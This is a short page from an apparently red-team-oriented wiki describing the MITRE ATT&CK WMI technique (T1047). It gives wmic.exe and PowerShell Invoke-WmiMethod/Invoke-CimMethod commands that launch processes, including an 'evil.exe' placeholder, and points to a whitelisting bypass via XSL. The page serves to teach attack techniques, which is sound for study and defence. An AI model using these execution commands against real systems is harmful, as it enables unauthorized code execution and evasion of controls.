search
Infiltr8ForumGitHub
githubEdit

WMI

MITRE ATT&CK™ Windows Management Instrumentation - Technique T1047

hashtag
Theory

Windows Management Instrumentation (WMI) provides a standardized way for querying and managing various elements of a Windows operating system. It allow administrators to perform standard management tasks that attackers can abuse to perform code execution.

We can use WMI to execute binary, commands, msi, services, scheduled tasks or XSL file that contain javascript payload with WMIC.

hashtag
Practice

Execute a local binary or a command using wmic.exe

wmic.exe process call create "C:\Windows\Temp\evil.exe"
wmic.exe process call create "cmd.exe /c calc.exe"

Or we may use powershell

#Execute a command remotely 
$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";

#Powershell v1+
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $Command

#Powershell v3+
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command }

You may want to check this page for remote WMI execution :

Remote WMIchevron-right

hashtag
Resources

LogoLiving Off the LandTryHackMechevron-right
LogoApplication Whitelisting Bypass with WMIC and XSL | Red Team Noteswww.ired.teamchevron-right

Last updated